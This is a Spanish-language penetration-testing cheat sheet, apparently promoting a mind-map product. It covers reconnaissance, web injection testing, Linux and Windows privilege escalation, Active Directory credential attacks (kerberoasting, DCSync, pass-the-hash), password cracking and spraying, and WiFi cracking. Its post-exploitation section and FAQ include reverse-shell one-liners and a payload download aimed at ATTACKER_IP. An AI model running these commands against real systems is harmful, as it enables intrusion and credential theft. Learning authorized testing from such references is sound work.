# Reconocimiento
La recopilación de información es la base de todo pentest. Comienza con reconocimiento pasivo y luego pasa al escaneo activo.
Nmap — Descubrimiento de Red
nmap -sC -sV -oA scan_results TARGET_IP
nmap -p- -T4 --min-rate=1000 TARGET_IP
nmap -sU --top-ports 200 TARGET_IP
nmap --script vuln TARGET_IP
Enumeración de Subdominios y DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
amass enum -d TARGET_DOMAIN -o amass_results.txt
dig axfr @DNS_SERVER TARGET_DOMAIN
Fuerza Bruta de Directorios y Archivos
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# Hacking de Aplicaciones Web
Prueba las vulnerabilidades del OWASP Top 10: SQLi, XSS, SSRF, IDOR, bypass de autenticación y más.
Inyección SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
sqlmap -r request.txt --level 5 --risk 3 --batch
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
SSRF y LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Esenciales de Burp Suite
curl -x http://127.0.0.1:8080 -k https://TARGET
# Servicios de Red
Protocolos y servicios comunes en pentests: SMB, FTP, SSH, HTTP, SNMP.
Enumeración SMB
smbclient -L //TARGET_IP -N
enum4linux -a TARGET_IP
crackmapexec smb TARGET_IP -u '' -p '' --shares
FTP
ftp TARGET_IP # Probar anonymous:anonymous
SNMP
snmpwalk -v2c -c public TARGET_IP
# Escalada de Privilegios Linux
Después de obtener una shell, escala a root. Revisa SUID, capabilities, cron jobs y exploits de kernel.
Scripts de Enumeración
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Binarios SUID
find / -perm -4000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Mala Configuración de Sudo
sudo -l
/etc/passwd con Escritura
openssl passwd -1 -salt hacker password123
# Escalada de Privilegios Windows
Escala de usuario con pocos privilegios a SYSTEM. Suplantación de tokens, abuso de servicios, rutas sin comillas.
Enumeración
winPEASany.exe quiet fast searchfast
whoami /priv
Suplantación de Tokens
.\GodPotato.exe -cmd "cmd /c whoami"
Rutas de Servicio sin Comillas
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Active Directory
Pentesting AD: enumerar usuarios, kerberoasting, AS-REP roasting, pass-the-hash, DCSync.
Enumeración
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
# Ataques de Contraseñas
Crackear hashes, fuerza bruta en servicios y pulverización de credenciales en la red.
Cracking de Hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Fuerza Bruta Online
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Pulverización de Contraseñas
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
# Post-Explotación
Después de obtener acceso: establecer persistencia, pivotar, exfiltrar datos.
Transferencia de Archivos
python3 -m http.server 8080
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Mejorar Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Pivoting
chisel server -p 8000 --reverse # En atacante
chisel client ATTACKER_IP:8000 R:socks # En objetivo
# Ataques Inalámbricos
Pentesting WiFi: capturar handshakes, crackear WPA2, puntos de acceso falsos.
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
aireplay-ng -0 5 -a BSSID wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Cloud y Kubernetes
Enumerar activos en la nube, explotar malas configuraciones en AWS, Azure, GCP y Kubernetes.
AWS
aws sts get-caller-identity
aws s3 ls s3://BUCKET_NAME --no-sign-request
Kubernetes
kubectl get pods --all-namespaces
kubectl auth can-i --list
❓ FAQ de Pentesting
Este cheatsheet cubre 200+ comandos esenciales usados en el OSCP y pentests reales: escaneo nmap, escalada de privilegios (Linux y Windows), ataques a Active Directory, hacking web y post-explotación.
Los comandos esenciales incluyen nmap para escaneo de red, sqlmap para inyección SQL, hashcat/john para crackeo de contraseñas, las herramientas impacket para Active Directory, y linpeas/winpeas para enumeración de escalada de privilegios.
Empieza con herramientas de reconocimiento (nmap, subfinder), aprende vulnerabilidades web (OWASP Top 10), practica en plataformas como HackTheBox, y usa un mapa mental estructurado como Pentest Mindmap para organizar tu conocimiento en 34 categorías.
La escalada de privilegios es el proceso de obtener permisos más altos que los obtenidos inicialmente. En Linux, los vectores comunes son los binarios SUID, configuraciones sudo incorrectas, tareas cron y entradas PATH escribibles. En Windows: SeImpersonatePrivilege (Potatoes), rutas de servicio sin comillas y AlwaysInstallElevated.
Las herramientas clave incluyen BloodHound (mapeo de rutas de ataque), impacket (GetUserSPNs, secretsdump, psexec), crackmapexec (credential spraying), evil-winrm (shells WinRM) y Rubeus (ataques Kerberos). Empieza mapeando el dominio con BloodHound para identificar la ruta más corta a Domain Admin.
La inyección SQL es una vulnerabilidad web donde una entrada controlada por el atacante se ejecuta como código SQL. Prueba manualmente con payloads como ' OR '1'='1 o usa sqlmap para detección automatizada: sqlmap -u 'http://objetivo/page?id=1' --batch --dbs. Puede llevar a exfiltración de datos, bypass de autenticación o ejecución remota de código.
El OWASP Top 10 es una lista estándar de los riesgos de seguridad más críticos de las aplicaciones web. En 2021 incluye: Control de Acceso Roto, Fallos Criptográficos, Inyección (SQLi, XSS), Diseño Inseguro, Configuración de Seguridad Incorrecta, Componentes Vulnerables, Fallos de Autenticación, SSRF y más. Es la base de la metodología de pentest web.
Un reverse shell es una conexión donde la máquina objetivo inicia una conexión de vuelta al listener del atacante. Inicia un listener con nc -lvnp 4444, luego activa el shell en el objetivo: bash -i >& /dev/tcp/IP_ATACANTE/4444 0>&1. Genera payloads para otros lenguajes con msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.
El movimiento lateral consiste en pivotar de un host comprometido a otros en la red interna. Técnicas comunes: Pass-the-Hash con impacket-psexec, Pass-the-Ticket con TGT de Kerberos, reenvío de agente SSH y port forwarding con chisel o túneles SSH. BloodHound mapea la ruta más corta a Domain Admin.
Un escaneo de vulnerabilidades (Nessus, OpenVAS) identifica automáticamente CVE conocidas y configuraciones incorrectas sin explotación. Un test de penetración va más allá: el pentester explota activamente las vulnerabilidades, escala privilegios y demuestra impacto real de negocio. Los pentests requieren autorización escrita y un alcance definido.
📚 Recursos Relacionados
- Cheatsheet Nmap — Referencia completa de flags Nmap y técnicas de escaneo de red
- Cheatsheet OSCP — Comandos clave y metodología para el examen OSCP
- Cheatsheet Burp Suite — Proxy, Repeater, Intruder y flujo de trabajo de pentest web
- Cheatsheet Metasploit — Referencia de msfconsole, msfvenom y Meterpreter
- Cheatsheet Active Directory — Kerberoasting, BloodHound, movimiento lateral y escalada de privilegios
- Cheatsheet Escalada de Privilegios Linux — SUID, sudo, cron, capabilities y exploits de kernel
- Cheatsheet Escalada de Privilegios Windows — Tokens, servicios sin comillas, registro y bypass de UAC
- Cheatsheet Reverse Shell — One-liners de Bash, Python, netcat, PowerShell y PHP
- Cheatsheet Inyección SQL — Payloads UNION, blind, error-based y automatización con sqlmap
- Cheatsheet Hashcat — Modos de hash, tipos de ataque, reglas y flujos de cracking
- Cheatsheet Wireshark — Filtros de captura y visualización, análisis de protocolos y forense
- Glosario de Pentesting — 60+ términos de ciberseguridad definidos para hackers éticos
- Cómo Empezar en Pentesting — Guía paso a paso con metodología y herramientas
Transforma tus hallazgos en un informe PDF profesional. La IA rellena CVE, CVSS y severidad automáticamente.
¿Quieres 12.020+ comandos en un mapa mental interactivo?
Este cheatsheet muestra una fracción de lo que ofrece Pentest Mindmap. Obtén 34 categorías, búsqueda instantánea y copia en un clic — organizado como un hermoso mapa mental interactivo.
Crear una cuenta gratis →